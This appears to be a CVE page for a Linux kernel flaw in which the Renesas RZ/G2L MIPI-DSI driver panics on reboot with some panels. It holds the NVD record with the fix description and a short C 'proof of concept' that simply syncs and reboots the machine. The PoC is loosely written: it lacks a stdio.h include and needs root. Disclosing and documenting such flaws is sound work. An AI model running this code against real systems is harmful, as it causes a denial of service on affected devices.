CVE-2026-43294

/* * PoC for CVE-2026-43294 * This vulnerability triggers a kernel panic during reboot on specific hardware. * Requires: Renesas RZ/G2L hardware and a specific panel (e.g., ili9881c). */ #include <unistd.h> #include <sys/reboot.h> #include <linux/reboot.h> int main() { // Triggering a reboot initiates the shutdown sequence // where the vulnerable driver code path is executed. printf("Attempting to trigger reboot panic...\n"); sync(); reboot(LINUX_REBOOT_CMD_RESTART); return 0; }

{"cve": {"id": "CVE-2026-43294", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:36.487", "lastModified": "2026-05-14T19:45:39.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panels\n\nSince commit 56de5e305d4b (\"clk: renesas: r9a07g044: Add MSTOP for RZ/G2L\")\nwe may get the following kernel panic, for some panels, when rebooting:\n\n systemd-shutdown[1]: Rebooting.\n Call trace:\n ...\n do_serror+0x28/0x68\n el1h_64_error_handler+0x34/0x50\n el1h_64_error+0x6c/0x70\n rzg2l_mipi_dsi_host_transfer+0x114/0x458 (P)\n mipi_dsi_device_transfer+0x44/0x58\n mipi_dsi_dcs_set_display_off_multi+0x9c/0xc4\n ili9881c_unprepare+0x38/0x88\n drm_panel_unprepare+0xbc/0x108\n\nThis happens for panels that need to send MIPI-DSI commands in their\nunprepare() callback. Since the MIPI-DSI interface is stopped at that\npoint, rzg2l_mipi_dsi_host_transfer() triggers the kernel panic.\n\nFix by moving rzg2l_mipi_dsi_stop() to new callback function\nrzg2l_mipi_dsi_atomic_post_disable().\n\nWith this change we now have the correct power-down/stop sequence:\n\n systemd-shutdown[1]: Rebooting.\n rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_disable(): entry\n ili9881c-dsi 10850000.dsi.0: ili9881c_unprepare(): entry\n rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_post_disable(): entry\n reboot: Restarting system"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.18.16", "matchCriteriaId": "40E6DAD9-881B-4BD4-B3F0-5D58086379A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/41cda667ffc5074c56279c632b0c20024da6ecdd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/64aa8b3a60a825134f7d866adf05c024bbe0c24c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/79f42487ed60d0d5ffce97c3bb98f80c3d17735a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}